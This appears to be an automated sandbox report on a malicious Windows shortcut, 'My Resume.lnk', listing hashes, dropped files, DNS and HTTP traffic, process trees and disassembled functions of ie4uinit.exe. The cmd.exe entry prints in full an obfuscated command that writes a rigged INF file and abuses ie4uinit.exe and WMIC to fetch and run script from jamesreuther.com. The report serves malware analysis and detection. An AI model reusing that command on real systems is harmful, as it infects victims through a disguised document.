Preview:	..0.2./.0.1./.2.0.2.2. .1.9.:.5.3.:.1.8...S.u.c.c.e.e.d...M.o.v.e...F.i.l.e.......C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.i.e.u.i.n.i.t...i.n.f...O.p.e.r.a.t.i.o.n. .a.b.o.r.t.e.d. .-. .n.o.t. .i.n. .s.e.t.u.p.....

\Device\ConDrv

Download File

Process:	C:\Windows\System32\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.095703110114614
Encrypted:	false
SSDEEP:	3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgkLyWAFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egk+eAin
MD5:	D3E3760EE14194A5D94F20A6349C9374
SHA1:	F91ACB7E2F3B95DB04996F88A63BD6692BA13178
SHA-256:	0257C9FBEFB316FDB28AB9EF0F0D52087D763ED561BB83714D306FC543FDDB63
SHA-512:	6AC9D6370B4A3195646637DF63F7D54ED16B3B4B19FED0FB36CB9C9DE846B5BE5178CAE9803C46F1998D66EFB431944FE2C8ED8A23EBEEA55D4AA42F993BB66A
Malicious:	false
Preview:	Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6940;...ReturnValue = 0;..};....

\Device\Null

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.37639561516815
Encrypted:	false
SSDEEP:	3:N/XANAKxcvn:B7KE
MD5:	D9C586991FACF81AE3350D1F2468D551
SHA1:	4021D00AB6D09D9DEF8964CF7D5B137E2057803D
SHA-256:	A04C3131D5D2D6A794281B2525967934811D733BE6DFCE8658AC90F520F8A14F
SHA-512:	8D37243809F6AF2D51F844497FBEB4268366D3121A8C76EFE74917C77B5044732ACDEB4638CE47B649AB3A00A8584855015D4DE374B184DB83C0809FA721D421
Malicious:	false
Preview:	1 file(s) copied...

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=97, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=236544, window=hide
Entropy (8bit):	3.296347762826849
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	My Resume.lnk
File size:	5235
MD5:	e1db05e6be33812c6289741472e9abe3
SHA1:	ca863c49be257e9ed0033a4c18bb3400c2396029
SHA256:	d6906cb7f9fb0f9cd12943509a1bb5e9409a4547a18f930b071d5c330e6c97f9
SHA512:	7108e60a693bd5036cb40ff319acb405e6fd071285623664fde1892bd12652cc6259ed935b37b8b5b28648feeb3d7b7b95b9ebe3ab1f7e139acb43b077944b99
SSDEEP:	48:8mpYVc726HQz71mUNK6EX51lr2djyct9rG228H19uZ61F4/sqo1X2QP2bFMg0mBW:8mpY3R+0cjonlIqtYEAzRc
File Content Preview:	L..................F.... ...............................a...................A....P.O. .:i.....+00.../C:\...................b.1......S.r..........@........OwH.Sey...........................4........................).......Z.1......Sni............B........O

File Icon


Icon Hash:	74f4e4e4e4e9e1ed

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 1, 2022 19:53:15.892200947 CET	49749	80	192.168.2.3	3.144.120.98
Feb 1, 2022 19:53:16.039894104 CET	80	49749	3.144.120.98	192.168.2.3
Feb 1, 2022 19:53:16.040199041 CET	49749	80	192.168.2.3	3.144.120.98
Feb 1, 2022 19:53:16.043211937 CET	49749	80	192.168.2.3	3.144.120.98
Feb 1, 2022 19:53:16.190843105 CET	80	49749	3.144.120.98	192.168.2.3
Feb 1, 2022 19:53:16.392364979 CET	80	49749	3.144.120.98	192.168.2.3
Feb 1, 2022 19:53:16.392560959 CET	49749	80	192.168.2.3	3.144.120.98
Feb 1, 2022 19:53:21.397562981 CET	80	49749	3.144.120.98	192.168.2.3
Feb 1, 2022 19:53:21.397718906 CET	49749	80	192.168.2.3	3.144.120.98
Feb 1, 2022 19:53:23.172271967 CET	49749	80	192.168.2.3	3.144.120.98

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 1, 2022 19:53:15.813930035 CET	53910	53	192.168.2.3	8.8.8.8
Feb 1, 2022 19:53:15.865458012 CET	53	53910	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 1, 2022 19:53:15.813930035 CET	192.168.2.3	8.8.8.8	0x198d	Standard query (0)	jamesreuther.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 1, 2022 19:53:15.865458012 CET	8.8.8.8	192.168.2.3	0x198d	No error (0)	jamesreuther.com		3.144.120.98	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

jamesreuther.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49749	3.144.120.98	80	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Timestamp	kBytes transferred	Direction	Data
Feb 1, 2022 19:53:16.043211937 CET	1123	OUT	GET /wmnxjogbfn HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: jamesreuther.com Connection: Keep-Alive
Feb 1, 2022 19:53:16.392364979 CET	1123	IN	HTTP/1.1 200 OK Date: Tue, 01 Feb 2022 18:53:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	1
Start time:	19:53:09
Start date:	01/02/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376!
Imagebase:	0x7ff7b95c0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	19:53:10
Start date:	01/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	19:53:11
Start date:	01/02/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"
Imagebase:	0x7ff6cb990000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	6
Start time:	19:53:12
Start date:	01/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	7
Start time:	19:53:13
Start date:	01/02/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings
Imagebase:	0x7ff6b5210000
File size:	221184 bytes
MD5 hash:	9DD77F0F421AA9A70383210706ECA529
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 2%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Target ID:	8
Start time:	19:53:14
Start date:	01/02/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache
Imagebase:	0x7ff6b5210000
File size:	221184 bytes
MD5 hash:	9DD77F0F421AA9A70383210706ECA529
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	10
Start time:	19:53:15
Start date:	01/02/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Imagebase:	0x7ff656990000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	11
Start time:	19:53:16
Start date:	01/02/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Imagebase:	0x7ff656990000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32.2%
Total number of Nodes:	516
Total number of Limit Nodes:	11

Executed Functions

Function 00007FF6B5211B44 Relevance: 91.3, APIs: 9, Strings: 43, Instructions: 275
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B5211394: _vsnwprintf.MSVCRT ref: 00007FF6B52113D4

RegOpenKeyExW.KERNEL32 ref: 00007FF6B5211EF1
memset.MSVCRT ref: 00007FF6B5211F0B
RegQueryValueExW.KERNEL32 ref: 00007FF6B5211F3D
StrCmpIW.SHLWAPI ref: 00007FF6B5211F5F
StrCmpICW.SHLWAPI ref: 00007FF6B5211F7C
memset.MSVCRT ref: 00007FF6B5211F9A
RegQueryValueExW.KERNEL32 ref: 00007FF6B5211FC7
StrCmpIW.SHLWAPI ref: 00007FF6B5211FEC
RegCloseKey.ADVAPI32 ref: 00007FF6B5212001

Strings

Microsoft Yi Baiti, xrefs: 00007FF6B5211C03
Sylfaen, xrefs: 00007FF6B5211B90, 00007FF6B5211D0B, 00007FF6B5211DE5
Myanmar Text, xrefs: 00007FF6B5211C45
software\microsoft\Internet Explorer\International\Scripts, xrefs: 00007FF6B5211EA7
Simsun, xrefs: 00007FF6B5211CDD
Simplified Arabic, xrefs: 00007FF6B5211BDE
Kalinga, xrefs: 00007FF6B5211C4C, 00007FF6B5211D91
Miriam Fixed, xrefs: 00007FF6B5211D19
Nyala, xrefs: 00007FF6B5211BC0
Gautami, xrefs: 00007FF6B5211C78, 00007FF6B5211DAD
Kartika, xrefs: 00007FF6B5211CA0, 00007FF6B5211DC9
NSimsun, xrefs: 00007FF6B5211E29
DokChampa, xrefs: 00007FF6B5211BA8
MS Gothic, xrefs: 00007FF6B5211E01
Shruti, xrefs: 00007FF6B5211C36, 00007FF6B5211D83
David, xrefs: 00007FF6B5211F6E
MV Boli, xrefs: 00007FF6B5211C71
Tahoma, xrefs: 00007FF6B5211CB1, 00007FF6B5211DD7
MingLiu, xrefs: 00007FF6B5211E0F
IEFixedFontName, xrefs: 00007FF6B5211FAE
Segoe UI Symbol, xrefs: 00007FF6B5211B9C
GulimChe, xrefs: 00007FF6B5211DF3
Latha, xrefs: 00007FF6B5211C62, 00007FF6B5211D9F
Mongolian Baiti, xrefs: 00007FF6B5211C87
Arial, xrefs: 00007FF6B5211BC7
Microsoft Himalaya, xrefs: 00007FF6B5211BB4
Plantagenet Cherokee, xrefs: 00007FF6B5211BED
Estrangelo Edessa, xrefs: 00007FF6B5211C2F
IEPropFontName, xrefs: 00007FF6B5211F1F
Iskoola Pota, xrefs: 00007FF6B5211C19
Gulim, xrefs: 00007FF6B5211CBC
DaunPenh, xrefs: 00007FF6B5211C5B
Courier New, xrefs: 00007FF6B5211CE8
Raavi, xrefs: 00007FF6B5211C20, 00007FF6B5211D75
Vrinda, xrefs: 00007FF6B5211C0A, 00007FF6B5211D67
Euphemia, xrefs: 00007FF6B5211BD7
Simplified Arabic Fixed, xrefs: 00007FF6B5211D4B
Times New Roman, xrefs: 00007FF6B5211B81
Tunga, xrefs: 00007FF6B5211C8E, 00007FF6B5211DBB
%s\%u, xrefs: 00007FF6B5211EB2
MS PGothic, xrefs: 00007FF6B5211CC7
Mangal, xrefs: 00007FF6B5211BF4, 00007FF6B5211D59
PMingLiu, xrefs: 00007FF6B5211CD2

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: QueryValuememset$CloseOpen_vsnwprintf
String ID: %s\%u$Arial$Courier New$DaunPenh$David$DokChampa$Estrangelo Edessa$Euphemia$Gautami$Gulim$GulimChe$IEFixedFontName$IEPropFontName$Iskoola Pota$Kalinga$Kartika$Latha$MS Gothic$MS PGothic$MV Boli$Mangal$Microsoft Himalaya$Microsoft Yi Baiti$MingLiu$Miriam Fixed$Mongolian Baiti$Myanmar Text$NSimsun$Nyala$PMingLiu$Plantagenet Cherokee$Raavi$Segoe UI Symbol$Shruti$Simplified Arabic$Simplified Arabic Fixed$Simsun$Sylfaen$Tahoma$Times New Roman$Tunga$Vrinda$software\microsoft\Internet Explorer\International\Scripts
API String ID: 3838326566-3455815564
Opcode ID: 5d1ea82af20d39b1534ae773d6a5ab919829b6683c7478c4cc332acd93e1da34
Instruction ID: 689734457fdc94c3da55974f1a098cbd5e38c88de67da52bcd800c92ec596eab
Opcode Fuzzy Hash: 5d1ea82af20d39b1534ae773d6a5ab919829b6683c7478c4cc332acd93e1da34
Instruction Fuzzy Hash: D4F1B936A16F8699E7618F24ED806D933A8FB44B48F500236DA8D87B6DEF38D655C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52120E4 Relevance: 63.2, APIs: 24, Strings: 12, Instructions: 228
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32 ref: 00007FF6B5212145
SHCopyKeyW.SHLWAPI ref: 00007FF6B5212165
RegCloseKey.KERNEL32 ref: 00007FF6B5212170
GetSystemDirectoryW.KERNEL32 ref: 00007FF6B5212189
LoadLibraryW.KERNEL32 ref: 00007FF6B52121BB
GetProcAddress.KERNEL32 ref: 00007FF6B52121D3
FreeLibrary.KERNEL32 ref: 00007FF6B52121E7
#33.IERTUTIL ref: 00007FF6B52121ED
SHFlushSFCache.SHELL32 ref: 00007FF6B52121F8
_time64.MSVCRT ref: 00007FF6B5212202
SHRegSetUSValueW.SHLWAPI ref: 00007FF6B5212232
memset.MSVCRT ref: 00007FF6B5212244
GetModuleHandleW.KERNEL32 ref: 00007FF6B5212252
GetModuleFileNameW.KERNEL32 ref: 00007FF6B5212268
PathFileExistsW.SHLWAPI ref: 00007FF6B52122B5
ExecuteCabW.IEADVPACK ref: 00007FF6B52122E8
GetModuleHandleW.KERNEL32 ref: 00007FF6B52122F2
ShellMessageBoxW.SHLWAPI ref: 00007FF6B521231A
RegCreateKeyExW.KERNEL32 ref: 00007FF6B5212431
RegCreateKeyExW.KERNEL32 ref: 00007FF6B5212476
RegQueryValueExW.KERNEL32 ref: 00007FF6B52124AE
RegSetValueExW.KERNELBASE ref: 00007FF6B52124DA
RegCloseKey.ADVAPI32 ref: 00007FF6B52124E5
RegCloseKey.ADVAPI32 ref: 00007FF6B52124F0

Strings

Software\Microsoft\Internet Explorer\SQM, xrefs: 00007FF6B521222B
Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF6B5212406
InstallDate, xrefs: 00007FF6B5212224
DefaultInstall.Windows7, xrefs: 00007FF6B52122D8
SOFTWARE\Microsoft\Internet Explorer\New Windows, xrefs: 00007FF6B521211B
mydocs.dll, xrefs: 00007FF6B5212198
SOFTWARE\Microsoft\Internet Explorer\Unattend\New Windows, xrefs: 00007FF6B5212154
@, xrefs: 00007FF6B5212312
ieuinit.inf, xrefs: 00007FF6B5212297
PerUserInit, xrefs: 00007FF6B52121C9
ShellFolder, xrefs: 00007FF6B521244E
Attributes, xrefs: 00007FF6B521248F, 00007FF6B52124C4

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseCreateModuleValue$FileHandleLibrary$AddressCacheCopyDirectoryExecuteExistsFlushFreeLoadMessageNamePathProcQueryShellSystem_time64memset
String ID: @$Attributes$DefaultInstall.Windows7$InstallDate$PerUserInit$SOFTWARE\Microsoft\Internet Explorer\New Windows$SOFTWARE\Microsoft\Internet Explorer\Unattend\New Windows$ShellFolder$Software\Microsoft\Internet Explorer\SQM$Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}$ieuinit.inf$mydocs.dll
API String ID: 1390537773-2640647115
Opcode ID: 47a474eeead17778a51976afd37e10ab335df0b82b775577c64414a2b4aa26e7
Instruction ID: d8b38cf4fb383ac532a4e3f31dd3c3199103d8e7ded37f49435cb615aa2b95bc
Opcode Fuzzy Hash: 47a474eeead17778a51976afd37e10ab335df0b82b775577c64414a2b4aa26e7
Instruction Fuzzy Hash: 36C13331A0AB9285EB209F29EE506EA7764FB84F84F400135DB4D87A6EDF7DE945C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5212DFC Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 225
commemorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EventRegister.ADVAPI32 ref: 00007FF6B5212E77
EventSetInformation.ADVAPI32 ref: 00007FF6B5212E96
InitOnceExecuteOnce.KERNEL32 ref: 00007FF6B5212EB0
rand_s.MSVCRT ref: 00007FF6B5212EDB
VirtualAlloc.KERNEL32 ref: 00007FF6B5212F07
HeapSetInformation.KERNEL32 ref: 00007FF6B5212F2B
OleInitializeWOW.OLE32 ref: 00007FF6B5212F33
SetErrorMode.KERNEL32 ref: 00007FF6B5212F46
CommandLineToArgvW.SHELL32 ref: 00007FF6B5212F59
memset.MSVCRT ref: 00007FF6B5212F9F
CreateEventW.KERNEL32 ref: 00007FF6B5212FCD
CreateThread.KERNEL32 ref: 00007FF6B5213007
WaitForSingleObject.KERNEL32 ref: 00007FF6B5213023
FindCloseChangeNotification.KERNEL32 ref: 00007FF6B521302E
StrCmpNIW.SHLWAPI ref: 00007FF6B5213087
LocalFree.KERNEL32 ref: 00007FF6B52130EB
GetLastError.KERNEL32 ref: 00007FF6B521313A
OleUninitialize.OLE32 ref: 00007FF6B521314E
EventUnregister.ADVAPI32 ref: 00007FF6B5213184

Strings

Starting ie4uinit.exe. Command Line:%1!lS!, xrefs: 00007FF6B5213037
Command Result: 0x%1!08lx!, xrefs: 00007FF6B5213123
ie4uInit.exe exiting. Process Result: 0x%1!08lx!======================================================, xrefs: 00007FF6B521315E
ie4uinit%s.log, xrefs: 00007FF6B5212FAE
Executing Command: %1!lS!, xrefs: 00007FF6B5213102

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Event$CreateErrorInformationOnce$AllocArgvChangeCloseCommandExecuteFindFreeHeapInitInitializeLastLineLocalModeNotificationObjectRegisterSingleThreadUninitializeUnregisterVirtualWaitmemsetrand_s
String ID: Command Result: 0x%1!08lx!$Executing Command: %1!lS!$Starting ie4uinit.exe. Command Line:%1!lS!$ie4uInit.exe exiting. Process Result: 0x%1!08lx!======================================================$ie4uinit%s.log
API String ID: 1538871842-118140733
Opcode ID: 6babbacca0a1ae9c5b1c65cc7804f061e99c7108235effaea19fc056a3ce0947
Instruction ID: 96b0ee18f5d3476542d62f341c5ea1de5f260a1aa5d8c1fb21f18b00f31a2ba9
Opcode Fuzzy Hash: 6babbacca0a1ae9c5b1c65cc7804f061e99c7108235effaea19fc056a3ce0947
Instruction Fuzzy Hash: CEB19D31A1AA5285EB10DF29EE505FA37A0FB44F80F400036DB4E9766ADF3DE945C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521B0DC Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B521B410: LocaleNameToLCID.KERNEL32(?,?,00000000,00007FF6B521B0F8), ref: 00007FF6B521B41F

GetSystemInfo.KERNEL32 ref: 00007FF6B521B105
#701.IERTUTIL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,00007FF6B521232A), ref: 00007FF6B521B130
IsJITInProgress.URLMON ref: 00007FF6B521B187
GetSystemInfo.KERNEL32 ref: 00007FF6B521B19C
IsJITInProgress.URLMON ref: 00007FF6B521B1B1
#701.IERTUTIL ref: 00007FF6B521B1D5
IsJITInProgress.URLMON ref: 00007FF6B521B20B

Part of subcall function 00007FF6B521B564: #701.IERTUTIL ref: 00007FF6B521B574

LocaleNameToLCID.KERNEL32 ref: 00007FF6B521B250
IsJITInProgress.URLMON ref: 00007FF6B521B26F
IsJITInProgress.URLMON ref: 00007FF6B521B283
EnterCriticalSection.KERNEL32 ref: 00007FF6B521B295
LeaveCriticalSection.KERNEL32 ref: 00007FF6B521B2AF

Strings

!x-sys-default-locale, xrefs: 00007FF6B521B249

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Progress$#701$CriticalInfoLocaleNameSectionSystem$EnterLeave
String ID: !x-sys-default-locale
API String ID: 3643492158-2729719199
Opcode ID: 598cb1cc18d71b4b703e7d5bc3462d6b3f2da086a651af043802d8819f626bcf
Instruction ID: 74c272d6794b847e362e7b7e78a334aec1d0d90efd7c8fe87d8fb65a2927e40f
Opcode Fuzzy Hash: 598cb1cc18d71b4b703e7d5bc3462d6b3f2da086a651af043802d8819f626bcf
Instruction Fuzzy Hash: 4F511928E0B61646FE64AB6CEF552FA12B1AF55F04F444034CB4DC62AFDE7EBC098251

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5212930 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B5215974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B52159AD
Part of subcall function 00007FF6B5215974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B5215A1F
Part of subcall function 00007FF6B5215974: PostThreadMessageW.USER32 ref: 00007FF6B5215A39

Part of subcall function 00007FF6B521A568: SetFileAttributesW.KERNEL32 ref: 00007FF6B521A66D
Part of subcall function 00007FF6B521A568: wcscat_s.MSVCRT ref: 00007FF6B521A72C
Part of subcall function 00007FF6B521A568: wcscat_s.MSVCRT ref: 00007FF6B521A743
Part of subcall function 00007FF6B521A568: FindFirstFileW.KERNEL32 ref: 00007FF6B521A755

Part of subcall function 00007FF6B521A854: memset.MSVCRT ref: 00007FF6B521A8D8
Part of subcall function 00007FF6B521A854: #820.IERTUTIL ref: 00007FF6B521A8EE
Part of subcall function 00007FF6B521A854: CoTaskMemAlloc.OLE32 ref: 00007FF6B521A95F
Part of subcall function 00007FF6B521A854: CoTaskMemFree.OLE32 ref: 00007FF6B521A9CC

GetModuleFileNameW.KERNEL32 ref: 00007FF6B521299D
memset.MSVCRT ref: 00007FF6B52129CF
CreateProcessW.KERNEL32 ref: 00007FF6B5212A23
CloseHandle.KERNEL32 ref: 00007FF6B5212A32
CloseHandle.KERNEL32 ref: 00007FF6B5212A3D
SHDeleteKeyW.SHLWAPI ref: 00007FF6B5212A56
